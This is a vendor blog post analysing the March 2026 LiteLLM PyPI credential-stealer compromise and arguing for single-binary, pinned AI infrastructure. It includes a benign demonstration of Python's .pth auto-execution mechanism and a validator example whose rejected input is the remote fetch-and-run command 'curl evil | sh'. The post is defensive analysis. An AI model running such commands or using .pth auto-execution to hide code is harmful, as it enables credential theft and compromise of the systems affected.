
Your AI infrastructure shouldn't be a pip install

On March 24, 2026, two versions of LiteLLM on PyPI shipped with a credential stealer. For roughly three hours, anyone who ran pip install litellm on one of the bad versions handed their SSH keys, cloud credentials, environment files, and anything else sitting on the box to a group that calls itself TeamPCP.

The part that should bother you isn't that it happened. The part that should bother you is that it was always going to.

What actually happened

Five days before the LiteLLM release, on March 19, TeamPCP rewrote a git tag in the trivy-action GitHub Action repository so the tag pointed at a malicious release. Many CI pipelines use that action. LiteLLM was one of them. When LiteLLM's next release pipeline ran, the trojanized action exfiltrated the maintainer's PyPI credentials.

On March 24 at 10:39 UTC, TeamPCP used those credentials to publish litellm==1.82.7 and litellm==1.82.8. Both wheels included a file called litellm_init.pth. The .pth mechanism is a Python feature: any import line in a .pth file in a site-packages directory is executed every time the Python interpreter starts. The payload ran in three stages. First, harvest credentials. Then, attempt Kubernetes lateral movement via privileged pods. Then, install a persistent systemd backdoor that phoned home for further payloads.
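The mechanism is easy to demonstrate. This is a minimal, benign sketch: CPython's site module exec()s any line in a .pth file that begins with an import statement, normally at interpreter startup for every .pth file in site-packages. Here the same code path is triggered explicitly with site.addsitedir() on a temporary directory.

```python
import os
import site
import tempfile

# Benign demonstration of the .pth auto-execution mechanism.
# CPython's site module exec()s any line in a .pth file that starts
# with "import ". At startup this runs for every .pth file in
# site-packages; here we invoke the same code path directly.
d = tempfile.mkdtemp()
with open(os.path.join(d, "demo_init.pth"), "w") as f:
    # One line, executed the moment site processing reads the file.
    # A real attacker would put a loader for a credential stealer here.
    f.write("import os; os.environ['PTH_DEMO_RAN'] = '1'\n")

assert "PTH_DEMO_RAN" not in os.environ
site.addsitedir(d)  # processes demo_init.pth exactly like startup would
print(os.environ["PTH_DEMO_RAN"])  # -> 1
```

No import of the package is needed, and no function call: dropping the file into site-packages is the whole attack.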

PyPI quarantined the packages within about three hours. In that window, the bad versions were pulled down roughly 119,000 times. For context, LiteLLM ships on the order of 3.4 million installs per day. The window was the cap on the damage, not the intent.

LiteLLM's team posted a security notice the same day, rotated credentials, and worked with PyPI on the post-mortem. The malicious code wasn't theirs. Their response was clean.

This isn't a LiteLLM problem

The point isn't that LiteLLM got hit. Anyone could have been hit. The point is the shape of what got hit.

When your AI infrastructure is a Python package, the thing that stands between attackers and your production is PyPI. Not PyPI the registry. PyPI as an ecosystem: every maintainer credential, every CI action, every transitive dependency, every tag you trust. None of that has anything to do with AI specifically. It has to do with the fact that Python packages run arbitrary code at install, at import, and at interpreter startup. The registry they install from is a dependency graph you didn't consent to.

This shape repeats in three places across an enterprise AI stack. The consequences differ at each layer.

Three layers, one constraint

An AI agent needs three pieces of infrastructure to do useful work safely. It needs to find a tool, call it under governance, and verify the contract still holds. Catalog, gateway, tests. Each one has its own supply-chain blast radius.

The gateway is the most obvious case. Every request hits it first, plaintext, authenticated, with whatever context the application attached. Compromising the gateway compromises everything. That's the property of a gateway. If somebody with a stolen credential on a dependency-of-a-dependency can put code on the box, they're in front of your traffic.

The catalog is the case nobody talks about yet, and it's worse. A catalog distributes the specs that tell an AI agent how to call a tool. If the catalog's supply chain is compromised, the attacker isn't sitting in front of your traffic. They're sitting inside the agent's instruction set. Every install of a tool spec is an opportunity to redirect, exfiltrate, or rewrite the very prompts and parameters the agent is about to send to its model. A catalog package compromised the way LiteLLM was compromised would be a more interesting incident, not a less interesting one.

The test runner is the quiet case. Test runners read your repository, your config, your CI secrets, and run against staging endpoints that often share auth with production. A trojanized test runner picks up the same blast radius as a trojanized CI action, which is exactly the vector that compromised LiteLLM's release in the first place.

All three are infrastructure, not application code. None of them is something you let your developers pip install into a virtualenv and forget about.

What a controlled supply chain looks like

The bar is boring and old. nginx and HAProxy have met it for twenty years:

  • One artifact. A single binary, or a signed container image. Not a zip of hundreds of files that auto-execute at import.
  • Built from a tagged commit in a repository you can audit.
  • Built reproducibly. Same commit, same artifact. Verifiable by someone other than the publisher.
  • Pinned, checksummed dependencies resolved at build time, not at install time, not at startup.
  • Runtime doesn't fetch code. The thing that starts in production is the thing you built. No plugins pulled from a public registry on first boot.
  • Narrow interpreter surface. No runtime eval, no config that executes user-supplied code in the main process, no .pth-style auto-load mechanisms.
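The pinning item in particular reduces to a small amount of discipline. A minimal sketch in Python, with an illustrative manifest that stands in for whatever format a real build tool records:

```python
import hashlib

# Sketch of build-time pinning and install-time verification.
# The "manifest" is illustrative, not any real tool's format: at build
# time, record a digest for every dependency artifact; at install time,
# refuse anything whose digest doesn't match the pin.
def sha256_hex(blob: bytes) -> str:
    return hashlib.sha256(blob).hexdigest()

artifact = b"pretend this is a dependency wheel or a vendored tarball"
manifest = {"dep-1.2.3": sha256_hex(artifact)}  # written at build time

def verify(name: str, blob: bytes) -> bool:
    # Resolution happened at build time; install time only checks.
    return sha256_hex(blob) == manifest[name]

print(verify("dep-1.2.3", artifact))         # True: matches the pin
print(verify("dep-1.2.3", artifact + b"!"))  # False: tampered, rejected
```

A stolen publisher credential can still push a new artifact upstream, but it can't make that artifact match a digest you recorded before the compromise.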

Every one of those is a direct control on the attack class TeamPCP used. None are novel. They're what production infrastructure has looked like for two decades.

The Python AI stack broke that baseline for a good reason: shipping a library was the fastest way to reach the audience that existed in 2023 and 2024. Developers wanted one pip install that spoke to every model. Fine. But the shape that works for a Python library inside an application doesn't scale to infrastructure sitting in front of production traffic, distributing executable specs to agents, or running with CI credentials. The March incident was a mechanical consequence of running one at the wrong layer.

What Soap Bucket builds, on this axis

All three pieces of our stack ship under the same constraint.

SBproxy is a single static binary. No interpreter on the execution path, no package manager at startup, no plugins fetched at first boot. When it starts, it parses YAML and binds ports. That's it.

clictl ships as a single binary too, and the catalog it distributes is shaped to the same rule. Tool specs are static, declarative, and sandboxed: network scope, filesystem scope, and environment access are all declared in the spec and enforced at runtime. A tool spec can't ship arbitrary install-time code, because the spec format doesn't have one. The catalog is data, not a Python package that runs on import.
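The spec-as-data property can be sketched in a few lines. The field names below are hypothetical, not clictl's actual schema; the point is that the spec declares scopes and the runtime enforces them, leaving nowhere for install-time code to hide.

```python
# Sketch of a spec-as-data catalog entry plus a runtime scope check.
# Field names are hypothetical, not clictl's real schema. The spec is
# inert data; all enforcement lives in the runtime that reads it.
spec = {
    "tool": "fetch_invoice",
    "network": ["api.example.com"],     # only host the tool may reach
    "filesystem": ["/var/tool/cache"],  # only path it may touch
    "env": ["INVOICE_API_KEY"],         # only variable it may read
}

def allow_network(spec: dict, host: str) -> bool:
    # The runtime decides; the spec only declares.
    return host in spec["network"]

print(allow_network(spec, "api.example.com"))   # True
print(allow_network(spec, "evil.example.net"))  # False
```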

mcptest ships as a single binary, and the YAML test files it runs are validated by a JSON Schema at load time. No plugin loader, no .pth-equivalent hook, no eval. If a malicious test file lands in your repo, it can fail your CI loudly. It cannot exfiltrate your secrets.
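That load-time discipline looks like this. The validator below is a hand-rolled stand-in and the key names are illustrative, not mcptest's real schema; the property that matters is that anything outside the schema is rejected before a single test executes.

```python
# Hand-rolled stand-in for schema validation at load time. Key names
# are illustrative, not mcptest's actual schema. A document with keys
# outside the allow-list is rejected before any test runs, so the worst
# a malicious file can do is fail CI loudly.
ALLOWED_KEYS = {"name", "request", "expect"}

def validate(doc) -> list:
    if not isinstance(doc, dict):
        return ["document must be a mapping"]
    return [f"unknown key: {k}" for k in doc if k not in ALLOWED_KEYS]

print(validate({"name": "ping", "request": {}, "expect": {}}))  # []
print(validate({"name": "x", "exec": "curl evil | sh"}))
# -> ['unknown key: exec']
```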

Releases for all three are cut from tagged commits in public repos. The binaries carry version, commit hash, and build date linked in at build time. Dependencies are pinned and checksummed in the build manifest. You can vendor the full dependency tree, audit it offline, and reproduce each binary from the tag.

None of this makes us immune. Module registries can be compromised, toolchains can be compromised, CI can be compromised. What we're claiming is that the shape of the attack surface is auditable. One artifact per product. One upstream. One dependency graph that resolves at build time, not install time. Every link in that chain is a file you can fingerprint and a commit you can read.

What to do right now

If you ran pip install litellm during the March window, rotate every credential that ever sat on that host, inspect your hosts for the systemd persistence and your cluster for leftover privileged pods, and read the Snyk technical writeup. The acute incident is over.

If you're picking AI infrastructure this quarter, the question to ask isn't "is your code secure." The question is: when I run your gateway, catalog, or test runner in production, what's the full set of things that have to be trustworthy, and how do I verify each one?

If the honest answer involves a Python interpreter, pip, PyPI, some number of transitive packages, the CI actions those packages use, and every maintainer credential behind them, write that down. That's your trust boundary. Compare it to the one you have for nginx or Envoy or any other production proxy you already run. The gap is the thing the March incident taught everyone about, the hard way.

We didn't set out to have opinions about supply chain. We set out to build infrastructure that runs in front of real traffic, in front of real agents, in front of real CI pipelines. The shape fell out of that.